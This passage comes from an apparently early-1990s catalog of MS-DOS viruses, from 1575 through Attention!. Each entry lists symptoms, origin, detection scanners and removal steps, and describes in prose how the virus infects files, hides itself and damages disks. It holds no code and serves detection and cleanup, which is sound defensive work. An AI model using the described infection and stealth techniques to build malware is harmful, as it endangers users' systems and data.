executed on a system with less than 640K of system memory, the virus will hang the system. Virus Name: 1575 Aliases: 1577, 1591 V Status: New Discovery: January, 1991 Symptoms: .COM & .EXE growth; decrease in total system & available memory; Sluggishness of DIR commands; file date/time changes Origin: Taiwan Isolated: Ontario, Canada Eff Length: 1,575 Bytes Type Code: PRfAk - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, Clean-Up V74+, or Delete infected files General Comments: The 1575 virus was first isolated in Ontario, Canada, in January, 1991. This virus has been widely reported, and is believed to be from the Far East, probably Taiwan. It is a memory resident infector of .COM and .EXE files, and will infect COMMAND.COM. When the first program infected with the 1575 Virus is executed, the virus will install itself memory resident in 1,760 to 1,840 bytes at the top of system memory, but below the 640K DOS boundary. This memory is not reserved, and may be overwritten later by another program. Interrupt 21 will be hooked by the virus. COMMAND.COM on the system C: drive root directory will also be infected at this time. Once the 1575 Virus is memory resident, it will infect one .COM and one .EXE program on the current drive whenever a DOS Dir or Copy command is executed. This virus does not spread when programs are executed. Infected files will have their file date and time in the DOS directory updated to the system date and time when the infection occurred. Their file lengths will also show an increase of between 1,577 and 1,591 bytes. This virus will be located at the end of infected files. It is not know if 1575 does anything besides replicate. Known variant(s) of the 1575 Virus are: 1575-B : This variant is functionally similar to the 1575 Virus described above. The major difference is that this variant reserves the memory it occupies at the top of system memory, though the interrupt 12 return is not moved. Virus Name: 1605 Aliases: V Status: Rare Discovery: September, 1990 Symptoms: .COM & .EXE growth; TSR; system slowdown Origin: Unknown Eff Length: 1,605 Bytes Type Code: PRsA - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V67+, Pro-Scan 2.01+ Removal Instructions: Scan/D, or Delete infected files General Comments: The 1605 Virus was uploaded to John McAfee's Homebase BBS by an anonymous user in September, 1990. The origin of this virus is unknown. The 1605 Virus is a memory resident infector of .COM and .EXE files, and it does not infect COMMAND.COM. It is based roughly on the Jerusalem B Virus. The first time a program infected with the 1605 Virus is executed, the virus will install itself memory resident as a low system memory TSR of 1,728 bytes. Interrupts 13 and 21 will be hooked by the virus. At this time, the system will slowdown by approximately 15-20%. After becoming memory resident, any .COM or .EXE file executed will be infected by the virus. .COM files will increase in size by 1,605 bytes in all cases with the virus's code being located at the beginning of the file. .EXE files will increase in size by between 1,601 and 1,610 bytes with the virus's code being located at the end of the infected file. Other than replicating, it is unknown if this virus carries any damage potential. Virus Name: 1704 Format Aliases: V Status: Rare Discovery: January, 1989 Symptoms: TSR, Falling letters, .COM growth, formatted disk Origin: Eff Length: 1,704 Bytes Type Code: PRC - Parasitic Encrypting Resident .COM Infector Detection Method: ViruScan, F-Prot, IBM Scan, Pro-Scan, VirexPC, AVKT 3.5+, VirHunt 2.0+ Removal Instructions: CleanUp, Scan/D, F-Prot, Pro-Scan, VirexPC, VirHunt 2.0+ General Comments: Like the Cascade Virus, but the disk is formatted when the virus activates. Activation occurs during the months of October, November, and December of any year except 1993. Virus Name: 1720 Aliases: PSQR Virus V Status: Rare Discovery: March, 1990 Symptoms : TSR, .COM & .EXE growth, partition table damage on activation, programs on diskette deleted on Friday The 13ths Origin: Spain Eff Length: 1,720 Bytes Type Code: PRsA - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V61+, VirexPC 1.1+, F-Prot 1.12+, VirHunt 2.0+, Pro-Scan 2.01+ Removal Instructions: Scan /D, VirHunt 2.0+, or delete infected files General Comments: The 1720, or PSQR Virus, is a variant of the Jerusalem Virus which was first isolated in Barcelona, Spain, in March 1990. This virus, infects .COM and .EXE files, though unlike Jerusalem, it does not infect Overlay files. COMMAND.COM will also not be infected. The first time an infected file is executed, the virus will install itself memory resident, and then infect each executable file as it is run. On Friday The 13ths, the 1720 Virus will activate the first time an infected program is executed. When the program is executed, it will be deleted from disk. More damaging, however, is that the 1720 virus will check to see if the system has a hard disk drive. If a hard disk drive is present, the virus will overwrite the boot sector and partition table resulting in all data on the hard disk becoming unavailable. The system will also appear to hang. Virus Name: 4096 Aliases: Century Virus, FroDo, IDF Virus, Stealth Virus, 100 Years Virus V Status: Common Discovery: January, 1990 Symptoms: .COM, .EXE, & overlay file growth; TSR hides growth; crosslinks; corruption of data files Origin: Israel Eff Length: 4,096 Bytes Type Code: PRsA - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V53+, F-Prot, IBM Scan, Pro-Scan, VirexPC 1.1+, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: CleanUp V62+, Pro-Scan 1.4+, F-Prot, VirHunt 2.0+, or see note below General Comments: The 4096 virus was first isolated in January, 1990. This virus is considered a Stealth virus in that it is almost invisible to the system user. The 4096 virus infects .COM, .EXE, and Overlay files, adding 4,096 bytes to their length. Once the virus is resident in system memory, the increase in length will not appear in a directory listing. Once this virus has installed itself into memory, it will infect any executable file that is opened, including if it is opened with the COPY or XCOPY command. This virus is destructive to both data files and executable files, as it very slowly crosslinks files on the system's disk. The crosslinking occurs so slowly that it appears there is a hardware problem, the virus being almost invisible. The crosslinking of files is the result of the virus manipulating the FATs, changing the number of available sectors, as well as the user issuing CHKDSK/F commands which will think that the files have lost sectors or crosslinking if the virus is in memory. As a side note, if the virus is present in memory and you attempt to copy infected files, the new copy of the file will not be infected with the virus if the new copy does not have an executable file extension. Thus, one way to disinfect a system is to copy off all the infected files to diskettes with a non-executable file extension (ie. don't use .EXE, .COM, .SYS, etc) while the virus is active in memory, then power off the system and reboot from a write protected (uninfected) system disk. Once rebooted and the virus is not in memory, delete the infected files and copy back the files from the diskettes to the original executable file names and extensions. The above will disinfect the system, if done correctly, but will still leave the problem of cross-linked files which are permanently damaged. On or after September 22 of any year, the 4096 virus will hang infected systems. This appears to be a "bug" in the virus in that it goes into a time consuming loop. The 4096 virus also contains a boot-sector within its code, however, it is never written out to the disk's boot sector. Moving this boot sector to the boot sector of a diskette and rebooting the system will result in the message "FRODO LIVES" being displayed. September 22 is Bilbo and Frodo Baggin's birthday in the Lord Of The Rings trilogy. An important note on the 4096 virus: this virus will also infect some data files. When this occurs, the data files will appear to be fine on infected systems. However, after the system is later disinfected, these files will now be corrupted and unpredictable results may occur. Known variant(s) of the 4096 virus include: 4096-B : Similar to the 4096 virus, the main change is that the encryption mechanism has been changed in order to avoid detection. 4096-C : Isolated in January, 1991, this variant of 4096 is similar to the original virus. The major difference is that the DOS ChkDsk command will not show any cross-linking of files or lost clusters. A symptom of infection by this variant is that the disk space available according to a DIR command will be more than the disk space available according to the DOS ChkDsk program. Virus Name: 4870 Overwriting Aliases: V Status: New Discovery: February, 1991 Origin: Unknown Symptoms: Programs fail to execute; Program corruption Eff Length: 4,870 Bytes Type Code: ONAK - Overwriting Non-Resident .COM & .EXE Infector Detection Method: Removal Instructions: Delete infected files General Comments: The 4870 Overwriting Virus was isolated in February, 1991. It's origin or isolation point is not known. This virus is a non-resident direct action virus that infects .COM and .EXE programs, including COMMAND.COM. When a program infected with the 4870 Overwriting Virus is executed, the virus will search the current directory for an uninfected .COM or .EXE file. The first such uninfected file located will be infected by the virus. Infected programs will have the first 4,870 bytes of the candidate program overwritten by the virus. If the program's original length was 4,870 bytes or more, there will be no increase in the file length in the DOS directory. If the program's original length was less than 4,870 bytes, then the program's length in the DOS directory will now be 4,870 bytes. The file's date and time in the directory will not be altered. Programs infected with the 4870 Overwriting Virus will not execute properly. Once the virus checked for a program to infect, and infected the candidate program if one was found, the virus will terminate and return the user to a DOS prompt. A side note on this virus: the virus itself is compressed with the LZEXE utility, which accounts for much of the 4,870 bytes of viral code. Programs infected with this virus will have the markers of LZEXE version .91 found in the first 4,870 bytes of the infected program. It is not possible to disinfect programs infected with the 4870 Overwriting Virus as the first 4,870 bytes of the original program are lost. Infected programs must be deleted or erased, then replaced with clean copies. Virus Name: 5120 Aliases: VBasic Virus, Basic Virus V Status: Rare Discovery: May, 1990 Origin: West Germany Symptoms: .COM & .EXE growth, file corruption, unexpected disk activity Eff Length: 5,120 Bytes Type Code: PNAK - Parasitic Non-Resident .COM & .EXE Infector Detection Method: ViruScan/X V67+, Pro-Scan 1.4+, F-Prot 1.12+ Removal Instructions: Scan/D/X, Pro-Scan 1.4+, F-Prot 1.12+, Pro-Scan 2.01+, or Delete infected files General Comments: The 5120 Virus was first isolated in May, 1990. It is a non- resident generic file infector, infecting .COM and .EXE files, including COMMAND.COM. This virus is was written in compiled Turbo Basic with some assembly language. When an infected file is executed, the 5120 virus will infect one .COM and one .EXE file on the current drive and directory, followed by attempting to infect one randomly selected .COM or .EXE file in each directory on the system's C: drive. Infected .COM files increase in length by 5,120 bytes. .EXE files infected by the 5120 Virus will increase in length by between 5,120 and 5,135 bytes. Unlike most of the MS-DOS viruses, the 5120 Virus does not intercept disk write errors when attempting to infect programs. Thus, infected systems may notice disk write error messages when no access should be occurring for a drive, such as the C: hard disk partition. Data files may become corrupted on infected systems, as well as crosslinking of files may occur. The following text strings can be found in files infected with the 5120 virus. These strings will appear near the end of the file: "BASRUN" "BRUN" "IBMBIO.COM" "IBMDOS.COM" "COMMAND.COM" "Access denied" There is one variant of the 5120 Virus which does not contain the above strings, but behaves in a very similar manner. This second variant is not indicated here as the author does not have a copy. Virus Name: AIDS Aliases: Hahaha, Taunt, VGA2CGA V Status: Endangered Discovery: 1989 Symptoms: Message, .COM file corruption Origin: Eff Length: N/A Type Code: ONC - Overwriting Non-Resident .COM Infector Detection Method: ViruScan/X V67+, Pro-Scan, VirexPC 1.1+, AVTK 3.5+ Removal Instructions: Scan/D/X, or delete infected .COM files General Comments: The AIDS virus, also known as the Hahaha virus in Europe and referred to as the Taunt virus by IBM, is a generic .COM and .EXE file infector. When the virus activates, it displays the message "Your computer now has AIDS", with AIDS covering about half of the screen. The system is then halted, and must be powered down and rebooted to restart it. Since this virus overwrites the first 13,952 bytes of the executable program, the files must be deleted and replaced with clean copies in order to remove the virus. It is not possible to recover the overwritten portion of the program. Note: this is NOT the Aids Info Disk/PC Cyborg Trojan. Known variant(s) of Aids are: Aids B : Very similar to the original Aids Virus, this variant is also 13,952 bytes in length. Unlike the original virus, it will only infect .COM files, as well as COMMAND.COM, and does not activate as the original virus did. Instead, this variant will occasionally issue the following error message: "I/O error 99, PC=2EFD Program aborted". This variant was received in January, 1991, origin unknown. Virus Name: Aids II Virus Aliases: Companion Virus V Status: Endangered Discovery: April, 1990 Symptoms: Creates .COM files, melody, message Origin: Eff Length: 8,064 Bytes Type Code: SNA - Spawning Non-Resident .COM & .EXE Infector Detection Method: ViruScan/X V67+, Pro-Scan 1.4+ Removal Instructions: Scan/D/X, or delete corresponding .COM files General Comments: The Aids II Virus, or Companion Virus, was isolated for the first time in April 1990. Unlike other generic file infectors, the Aids II Virus is the first known virus to employ what could be termed a "corresponding file technique" of infection so that the original target .EXE file is never changed. The virus takes advantage of the DOS feature where if a program exists in both .COM and .EXE form, the .COM file will be executed. The Aids II Virus does not directly infect .EXE files, instead it stores a copy of the virus in a corresponding .COM file which will be executed when the user tries to execute one of his .COM files. The .EXE file, and the .COM file containing the viral code will both have the same base file name. The method of infection is as follows: when an "infected" program is executed, since a corresponding .COM file exists, the .COM file containing the viral code is executed. The virus first locates an uninfected .EXE file in the current directory and creates a corresponding (or companion) .COM file with the viral code. These .COM files will always be 8,064 Bytes in length with a file date/time of the date/time of infection. The .EXE file is not altered at all. After creating the new .COM file, the virus then plays a melody and displays the following message, the "" indicated below actually being ansi heart characters: "Your computer is infected with ... * Aids Virus II * - Signed WOP & PGT of DutchCrack -" The Aids II Virus then spawns to the .EXE file that was attempting to be executed, and the program runs without problem. After completion of the program, control returns to the Aids II Virus. The melody is played again with the following message displayed: "Getting used to me? Next time, use a Condom ....." Since the original .EXE file remains unaltered, CRC checking programs cannot detect this virus having infected a system. One way to manually remove the Aids II Virus is to check the disk for programs which have both a .EXE and a .COM file, with the .COM file having a length of 8,064 bytes. The .COM files thus identified should be erased. The displayed text strings do not appear in the viral code. Virus Name: AirCop Aliases: V Status: Rare Discovery: July, 1990 Isolated: Washington, USA Symptoms: BSC; System Halt; Message; decrease in system and free memory Origin: Taiwan Eff Length: N/A Type Code: FR - Resident Floppy Boot Sector Infector Detection Method: ViruScan V66+, Pro-Scan 2.01+ Removal Instructions: MDisk or DOS SYS command General Comments: The AirCop Virus was discovered in the State of Washington in the United States in July, 1990. Some early infections of this virus, however, have been traced back to Taiwan, and Taiwan is probably where it originated. AirCop is a boot sector infector, and it will only infect 360K 5.25" floppy diskettes. When a system is booted from a diskette which is infected with the AirCop virus, the virus will install itself memory resident. The AirCop Virus installs itself memory resident at the top of high system memory. The system memory size and available free memory will decrease by 1,024 bytes when the AirCop virus is memory resident. AirCop hooks interrupt 13. Once AirCop is memory resident, any non-write protected diskettes which are then accessed will have their boot sector infected with the AirCop virus. AirCop will copy the original disk boot sector to sector 719 (Side 1, Cyl 39, Sector 9 on a normal 360K 5.25" diskette) and then replace the boot sector at sector 0 with a copy of the virus. If a boot sector of a diskette infected with the AirCop virus is viewed, it will be missing almost all of the messages which normally appear in a normal boot sector. The only message remaining will be: "Non-system..." This will be located just before the end of the boot sector. The AirCop Virus will do one of two things on infected systems, depending on how compatible the system's software and hardware is with the virus. On most systems, the virus will display the following message at random intervals: "Red State, Germ Offensive. AIRCOP." On other systems, the virus being present will result in the system receiving a Stack Overflow Error and the system being halted. In this case, you must power off the system in order to be able to reboot. AirCop currently does not infect hard disk boot sectors or partition tables. AirCop can be removed from infected diskettes by first powering off the system and rebooting from a known clean write protected DOS master diskette. The DOS SYS command should then be used to replace the infected diskette's boot sector. Alternately, MDisk can be used following the power-down and reboot. Virus Name: Akuku Aliases: V Status: New Discovery: January, 1991 Symptoms: .COM & .EXE growth; "Error in EXE file" message; Unexpected drive accesses Origin: USSR Eff Length: 891 Bytes Type Code: PNAK - Parasitic Non-Resident .COM & .EXE Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected files General Comments: The Akuku Virus was isolated in January, 1991, and comes from the USSR. This virus is a non-resident direct action infector of .COM and .EXE files, including COMMAND.COM. When a program infected with Akuku is executed, the virus will infect three programs in the current directory. If three uninfected programs cannot be found in the current directory, the virus will search the disk directory of the current drive, as well as of the C: drive. Both .COM and .EXE programs may become infected, as well as COMMAND.COM. Programs smaller than 1K will not be infected by this virus. Infected programs will increase in length by 891 to 907 bytes, the virus will be located at the end of the infected file. The file date and time in the disk directory will not be altered by the virus. The following text string is contained within the virus's code, and can be found in all infected programs: "A kuku, Nastepny komornik !!!" Some .EXE programs will fail to execute properly after infection by the Akuku Virus. These programs may display an "Error in EXE file" message and terminate when the user attempts to execute them. Virus Name: Alabama Aliases: V Status: Endangered Discovery: October, 1989 Symptoms: .EXE growth, Resident (see text), message, FAT corruption Origin: Israel Eff Length: 1,560 bytes Type Code: PRfET - Parasitic Resident .EXE infector Detection Method: ViruScan/X V67+, F-Prot, IBM Scan, Pro-Scan, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: CleanUp, F-Prot, Pro-Scan 1.4+, Scan/D/X, VirHunt 2.0+, or delete infected files General Comments: The Alabama virus was first isolated at Hebrew University in Israel by Ysrael Radai in October, 1989. Its first known activation was on October 13, 1989. The Alabama virus will infect .EXE files, increasing their size by 1,560 bytes. It installs itself memory resident when the first program infected with the virus is executed, however it doesn't use the normal TSR function. Instead, this virus hooks Int 9 as well as making use of IN and OUT commands. When a CTL-ALT-DEL combination is detected, the virus causes an apparent boot but remains in RAM. The virus loads itself 30K under the highest memory location reported by DOS, and does not lower the amount of memory reported by BIOS or DOS. After the virus has been memory resident for one hour, the following message will appear in a flashing box: "SOFTWARE COPIES PROHIBITED BY INTERNATIONAL LAW.............. Box 1055 Tuscambia ALABAMA USA." The Alabama virus uses a complex mechanism to determine whether or not to infect the current file. First, it checks to see if there is an uninfected file in the current directory, if there is one it infects it. Only if there are no uninfected files in the current directory is the program being executed infected. However, sometimes instead of infecting the uninfected candidate file, it will instead manipulate the FATs to exchange the uninfected candidate file with the currently executed file without renaming it, so the user ends up thinking he is executing one file when in effect he is actually executing another one. The end result is that files are slowly lost on infected systems. This file swapping occurs when the virus activates on ANY Friday. Virus Name: Alameda Aliases: Merritt, Peking, Seoul, Yale V Status: Rare Discovery: 1987 Symptoms: Floppy boot failures, Resident-TOM, BSC Origin: California, USA Eff Length: N/A Type Code: RtF - Resident Floppy Boot Sector Infector Detection Method: ViruScan, F-Prot, IBM Scan, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: MDisk, CleanUp, F-Prot, or DOS SYS General Comments: The Alameda virus was first discovered at Merritt college in Alameda, California in 1987. The original version of this virus caused no intentional damage, though there is now at least 1 variant of this virus that now causes floppy disks to become unbootable after a counter has reached its limit (Alameda-C virus). The Alameda virus, and its variants, all replicate when the system is booted with a CTL-ALT-DEL and infect only 5 1/4" 360K diskettes. These viruses do stay in memory thru a warm reboot, and will infect both system and non-system disks. System memory can be infected on a warm boot even if Basic is loaded instead of DOS. The virus saves the real boot sector at track 39, sector 8, head 0. The original version of the Alameda virus would only run on a 8086/8088 machine, though later versions can now run on 80286 systems. Also see: Golden Gate, SF Virus Virus Name: Ambulance Car Virus Aliases: RedX V Status: Rare Discovery: June, 1990 Symptoms: .COM growth, graphic display & sound Origin: West Germany Eff Length: 796 Bytes Type Code: PNC - Parasitic Non-Resident .COM Infector Detection Method: ViruScan V64+, F-Prot 1.12+, Pro-Scan 2.01+ Removal Instructions: Scan/D, Pro-Scan 2.01+, or Delete infected files General Comments: The Ambulance Car Virus was isolated in West Germany in June, 1990. This virus is a non-resident .COM infector. When a program infected with the Ambulance Car Virus is executed, the virus will attempt to infect one .COM file. The .COM file to be infected will be located on the C: drive. This virus only infects one .COM file in any directory, and never the first .COM file in the directory. It avoids infecting COMMAND.COM as that file is normally the first .COM file in the root directory. On a random basis, when an infected file is executed it will have the affect of a graphics display of an ASCII block drawing of an ambulance moving across the bottom of the system display. This graphics display will be accompanied with the sound of a siren played on the system's speaker. Both of these effects only occur on systems with a graphics capable display adapter. Virus Name: Amstrad Aliases: V Status: Endangered Discovery: November, 1989 Symptoms: .COM growth, message Origin: Portugal Eff Length: 847 Bytes Type Code: PNC - Parasitic Non-Resident .COM Infector Detection Method: ViruScan/X V67+, F-Prot, IBM Scan, Pro-Scan, VirexPC 1.1+, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: Scan/D/X, F-Prot, Pro-Scan 1.4+, or delete infected files General Comments: The Amstrad virus was first reported in November, 1989, by Jean Luz of Portugal, however it has been known of in Spain and Portugal for a year prior to that. The virus is a generic .COM infector, but is not memory resident nor does it infect COMMAND.COM. The virus carries a fake advertisement for the Amstrad computer. The Amstrad virus appears to cause no other damage to the system other than replicating and infecting files. Known variants of the Amstrad Virus are: Pixel/V-345 - Similar to the Amstrad virus described above, except that the virus is 345 Bytes in length, can now infect COMMAND.COM, and contains the message: "=!= Program sick error:Call doctor or by PIXEL for cure description". This message is not displayed. The Pixel virus was originally distributed in Greece by Pixel magazine. The Pixel Virus can only infect programs in the current directory. This variant may in fact be the original virus in this family, it is rumored that it was released one year before the appearance of the virus in Portugal. Origin: Greece V-277 - Similar to the Pixel/V-345 virus described above, except that the virus is now 277 Bytes in length, and does not contain any message text. The original message text has been replaced with code to produce a parity error approximately 50% of the time when an infected program is executed. Origin: Bulgaria V-299 - Similar to Pixel, except that the length of the virus is 299 Bytes. Origin: Bulgaria V-847 - Similar to Pixel, except that the length of the virus is 847 Bytes. Origin: Bulgaria V-847B - Similar to V-847, except that the message in the virus is now in Spanish and is: "=!= En tu PC hay un virus RV1, y esta es su quinta generacion". This variant was originally distributed by a magazine in Spain in file NOCARGAR.COM. Origin: Spain V-852 - Similar to the V-847 variant, this variant does not contain any message. It infects all .COM files in the current directory whenever an infected program is executed. If the current directory contains COMMAND.COM, it will be infected as well. The original sample of this variant received by the author did not contain any text, however after replicating on a test system, all infected files then contained text from the video buffer, which implies the submitted sample was the original distribution of the virus. This variant checks byte 4 of .COM files to determine if the file was previously infected, if bytes 4-5 are 'SS', the virus assumes the file is already infected. All infected programs will start with the following hex string, with the nn indicated being a generation number: "EB14905353nn2A2E434F4D004F040000" Origin: Bulgaria Virus Name: Anthrax Aliases: V Status: Rare Discovery: July, 1990 Symptoms: .COM & .EXE growth Origin: Bulgaria Isolated: Netherlands Eff Length: 1040 - 1279 Bytes Type Code: PRAKX - Parasitic Resident .COM, .EXE, & Partition Table Infector Detection Method: ViruScan V66+, Pro-Scan 2.01+ Removal Instructions: Scan/D + MDisk/P, Pro-Scan 2.01+ General Comments: The Anthrax Virus was isolated in July 1990 in the Netherlands after it was uploaded onto several BBSes in a trojan anti-viral program, USCAN.ZIP. It is the second virus to be found in a copy of UScan during July 1990, the first virus being V2100. Anthrax is a memory resident generic infector of .COM and .EXE files, including COMMAND.COM. The first time a program infected with the Anthrax virus is executed on the system's hard disk, the virus will infect the hard disk's partition table. At this point, the virus is not memory resident. It will also write a copy of itself on the last few sectors of the system's hard disk. If data existed on those last few sectors of the hard disk, it will be destroyed. When the system is booted from the hard disk, the Anthrax virus will install itself memory resident. It will remain memory resident until the first program is executed. At that time, it will deinstall itself from being resident and infect one .COM or .EXE file. This virus does not infect files in the current directory first, but instead starts to infect files at the lowest level of the disk's directory tree. Later, when an infected program is executed, Anthrax will infect one .COM or .EXE file, searching the directory structure from the lowest level of the directory tree. If the executed infected program was located on the floppy drive, a .COM or .EXE file may or may not be infected. The Anthrax Virus's code is 1,024 bytes long, but infected programs will increase in length by 1,040 to 1,279 bytes. On the author's test system, the largest increase in length experienced was 1,232 bytes. Infected files will always have an infected file length that is a multiple of 16. The following text strings can be found in files infected with the Anthrax virus: "©Damage, Inc." "ANTHRAX" A third text string occurs in the viral code, but it is in Cyrillics. Per Vesselin Bontchev, this third string translates to: "Sofia 1990". Since Anthrax infects the hard disk partition tables, infected systems must have the partition table disinfected or rebuilt in order to remove the virus. This disinfection can be done with either a low- level format or use of the MDisk/P program for the correct DOS version after powering off and rebooting from a write-protected boot diskette for the system. Any .COM or .EXE files infected with Anthrax must also be disinfected or erased. Since a copy of the virus will exist on the last few sectors of the drive, these must also be located and overwritten. Anthrax interacts with another virus: V2100. If a system which was previously infected with Anthrax should become infected with the V2100 virus, the V2100 virus will check the last few sectors of the hard disk for the spare copy of Anthrax. If the spare copy is found, then Anthrax will be copied to the hard disk's partition table. It is not known if Anthrax carries any destructive capabilities or trigger/activation dates. Virus Name: Anti-Pascal Aliases: Anti-Pascal 605 Virus, AP-605, C-605, V605 V Status: Research Discovery: June, 1990 Symptoms: .COM growth, .BAK and .PAS file corruption Origin: Bulgaria Isolated: Sofia, Bulgaria Eff Length: 605 Bytes Type Code: PNCK - Parasitic Non-Resident .COM Infector Detection Method: ViruScan/X V67+, Pro-Scan 2.01+ Removal Instructions: Pro-Scan 2.01+, Scan/D/X, or delete infected files General Comments: The Anti-Pascal Virus, V605 or C-605, was isolated in Sofia, Bulgaria in June 1990 by Vesselin Bontchev. Originally, it was thought that the Anti-Pascal virus was from the USSR or Poland, but it has since been determined to have been a research virus written in Bulgaria over one year before it was isolated. The author was not aware that it had "escaped" until July, 1990. The Anti-Pascal Virus is a generic .COM file infector, including COMMAND.COM. While this virus is not memory resident, when it is in the process of infecting files, interrupt 24 will be hooked. When a program infected with the Anti-Pascal virus is executed, the virus will attempt to infect two other .COM files on the current drive or on drive D: which are between 605 and 64,930 bytes in length. These files must not have the read only attribute set. If an uninfected .COM file meeting the virus's selection criteria is found, the first 605 bytes of the program is overwritten with the viral code. The original 605 bytes of the program is then appended to the end of the infected file. Infected files will have increased in length by 605 bytes, and they will also begin with the text string "PQVWS" as well as contain the string "combakpas???exe" at offset 0x17. Infected files will also have had their file date/time stamps in the directory updated to the date/time that the infection occurred. If the Anti-Pascal Virus cannot find two .COM files to infect, it will check the current drive and directory for .BAK and .PAS files. If these files exist, they will be overwritten with the virus's code. If the overwritten files were .PAS files, the system's user has now lost some of their Pascal source code. After overwriting .BAK and .PAS files, the virus will attempt to rename them to .COM files, or .EXE files if a .COM file already exists. This rename does not work due to a bug in the virus. Known variant(s) of the Anti-Pascal Virus are: AP-529 : Similar to the 605 byte Anti-Pascal Virus, the major differences are that AP-529 will only infect .COM files over 2,048 bytes in length. Infected files increase in length by 529 bytes. Additionally, instead of overwriting the .BAK and .PAS files, one .BAK and .PAS file will be deleted if there are no uninfected .COM files with a length of at least 2,048 bytes on the current drive. .COM files on the C: drive root directory may also be infected by AP-529 when it is executed from the A: or B: drive. This variant should be considered a "Research Virus", it is not believed to have been publicly released. Also see: Anti-Pascal II Virus Name: Anti-Pascal II Aliases: Anti-Pascal 400, AP-400 V Status: Research Discovery: June, 1990 Symptoms: .COM growth; .BAK, .BAT and .PAS file deletion, boot sector alteration on hard disk Origin: Bulgaria Isolated: Sofia, Bulgaria Eff Length: 400 Bytes Type Code: PNCK - Parasitic Non-Resident .COM Infector Detection Method: ViruScan/X V67+, Pro-Scan 2.01+ Removal Instructions: Pro-Scan 2.01+, Scan/D/X, or delete infected files General Comments: The Anti-Pascal II Virus, or AP-400, was isolated in Sofia, Bulgaria in June 1990 by Vesselin Bontchev. It is one of five viruses/variants in the Anti-Pascal family. Two of the earlier variants, Anti-Pascal/AP-605 and AP-529, are documented under the name "Anti-Pascal". The variants listed under Anti-Pascal II have been separated due to some of their characteristics differing from the 605 byte and 529 byte viruses. The Anti-Pascal II Virus is a generic .COM file infector, including COMMAND.COM. While this virus is not memory resident, when it is in the process of infecting files, interrupt 21 will be hooked. The first time a program infected with the Anti-Pascal II virus is executed on a system, the virus will attempt to infect one (1) .COM file in the root directory of each drive accessible on the system. Files are only infected if their length is at least 2,048 bytes, and the resulting infected file will be less than 64K in length. Since COMMAND.COM is usually the first .COM file on a drive, it will immediately become infected. One additional .COM file will also be infected on the current drive. The mechanism used to infect the file is to write the virus's code to the end of the file. A jump is used to execute the virus's code before the original program is executed. Infected files do not have their date/time stamps in the directory updated to the system date and time when the infection occurred. If the Anti-Pascal Virus cannot find a .COM file to infect on a given drive, or two .COM files to infect on the current drive, it will check for the existence of .BAK, .PAS, or .BAT files. If found, these files will be deleted. These deletions only occur in root directories and on the current drive's current directory. Since each root directory (as well as the current directory) will typically not have all of its .COM files infected at the same time, the deletes will occur on different drives and directories at different times. Symptoms of infection of the Anti-Pascal II Virus include file length increases of 400 bytes, unexpected disk access to drives other than the current drive, and disappearing .BAK, .PAS, and .BAT files. One other symptom of an Anti-Pascal II infection is that the hard disk's boot sector will be slightly altered by the virus. Anti-viral programs which CRC-check the boot sector will indicate that a boot sector infection may have occurred. The boot sector alteration does not contain a live virus, but will throw the system user off into thinking their problem is from a boot sector virus instead of a file infector, and if the disk as a bootable disk, it will not be unbootable. The Anti-Pascal II Virus and its variants indicated below are not believed to have been publicly released. As such, they have been classified as "Research Viruses". Known variant(s) of the Anti-Pascal II Virus are: AP-440 : Very similar to the 400 byte version of the Anti-Pascal II Virus, the major characteristic change is that this variant has a length of 440 bytes. The boot sector is no longer altered by the virus. This variant is an intermediary between AP-480 and the 400 byte version documented above. AP-480 : Similar to the Anti-Pascal II virus, this variant is the version which is 480 bytes in length. It does not delete .BAT files, but only .BAK and .PAS. This variant is the latest variant of the Anti-Pascal II grouping. Also see: Anti-Pascal Virus Name: Armagedon Aliases: Armagedon The First, Armagedon The Greek V Status: Rare Discovery: June, 1990 Symptoms: text string intermittently sent to COM ports Origin: Athens, Greece Eff Length: 1,079 Bytes Type Code: PRC - Parasitic Resident .COM Infector Detection Method: ViruScan V64+, F-Prot 1.12+, Pro-Scan 2.01+ Removal Instructions: Scan/D, F-Prot 1.12+, or Delete infected files General Comments: The Armagedon virus was isolated on June 2, 1990, by George Spiliotis of Athens, Greece. Armagedon is a memory resident virus which infects .COM files, increasing their length by 1,079 bytes. The first time an infected program is executed on a system, the virus installs itself memory resident, hooking interrupts 8 and 21. Any .COM files which are later executed are then infected by the resident virus. Infected systems will experience the text string "Armagedon the GREEK" being sent to COM ports 1 - 4 at time intervals. Between 5:00 and 7:00, the virus will attempt to use the system's COM ports to make a phone call to Local Time Information in Crete, Greece. If a connection is made, the phone line will remain open until the user notices that the phone line is in use. (Needless to say, this doesn't work if the system is located outside of Greece as dialing codes are considerably different between countries.) This virus otherwise is not destructive. Virus Name: Ashar Aliases: Shoe_Virus, UIUC Virus V Status: Common Discovery: Symptoms: BSC, Resident TOM Origin: Eff Length: N/A Type Code: BRt - Resident Boot Sector Infector Detection Method: ViruScan V41+, F-Prot, IBM Scan, Pro-Scan 1.4+, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: MDisk, CleanUp, Pro-Scan 1.4+, F-Prot or DOS SYS command General Comments: The Ashar virus is a resident boot sector infector which is a variant of the Brain virus. It differs from the Brain virus in that it can infect both floppies and hard disk, and the message in the virus has been modified to be: "VIRUS_SHOE RECORD, v9.0. Dedicated to the dynamic memories of millions of virus who are no longer with us today". However, the above message is never displayed. The identification string "ashar" is normally found at offset 04a6 hex in the virus. A variant of the Ashar virus exists, Ashar-B or Shoe_Virus-B, which has been modified so that it can no longer infect hard drives. The v9.0 in the message has also been altered to v9.1. Also see: Brain Virus Name: Attention! Aliases: USSR 394 V Status: Rare Discovery: December, 1990 Symptoms: .COM file growth; decrease in system and available memory; clicking emitted from system speaker on keypress; file date/time changes Origin: USSR Eff Length: 394 Bytes Type Code: PRhCK - Parasitic Resident .COM Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected files General Comments: The Attention! Virus was submitted in December, 1990 and was originally isolated in the USSR. This virus is a memory resident infector of COM files, including COMMAND.COM. The first time a program infected with the Attention! Virus is executed, the virus will reserve 416 bytes at the top of system memory but below the 640K DOS boundary. The virus becomes memory resident in this area, and hooks interrupt 21. Total system memory and available free memory returned 